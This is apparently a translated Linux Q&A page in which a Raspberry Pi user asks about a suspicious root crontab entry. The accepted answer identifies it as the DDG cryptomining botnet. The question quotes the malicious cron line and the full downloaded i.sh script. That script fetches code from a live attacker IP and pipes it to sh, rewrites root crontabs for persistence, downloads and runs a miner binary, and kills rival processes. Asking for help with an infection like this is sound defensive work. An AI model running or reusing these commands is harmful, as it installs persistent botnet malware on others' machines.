GNU/Linux >> Linux の 問題 >  >> Linux

15分ごとに「xribfa4」を実行している疑わしいcrontabエントリ?

Raspberry Piのルートcrontabファイルに何かを追加したかったのですが、疑わしいと思われるエントリを見つけました。Googleでその一部を検索しても、何も見つかりませんでした。

crontabエントリ:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

http://103.219.112.66:8000/i.shの内容 は:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

私のLinuxの知識は限られていますが、インドネシアのサーバーからバイナリをダウンロードして定期的にrootとして実行することは、通常のことではないようです。

これは何ですか?どうすればいいですか?

承認された回答:

これはDDGマイニングボットネットであり、どのように機能するか:

  1. RCEの脆弱性を悪用する
  2. crontabの変更
  3. 適切なマイニングプログラムのダウンロード(goで記述)
  4. マイニングプロセスの開始

DDG:データベースサーバーを対象としたマイニングボットネット

ボットネットが別のボットネットのインフラストラクチャを借用する場合のSystemdMiner

U&L:AWS EC2インスタンスでminerdマルウェアを強制終了するにはどうすればよいですか? (侵害されたサーバー)


Linux

  1. Linux で 6 時間ごとに cron ジョブを実行する

  2. シェル スクリプトが実行されているかどうかを確認する Linux コマンド

  3. 実行中のプロセスPythonのリストを表示するには?

  1. 17すべてのシステム管理者が知っておくべきLinuxコマンド

  2. CronJob 25 分ごと

  3. Cron を 2 時間ごとに実行する

  1. テキストファイルのすべての行に対してコマンドを実行する

  2. Bashが実行されているTtyを取得する方法は?

  3. root 以外のユーザーが crontab エントリを作成できないようにする方法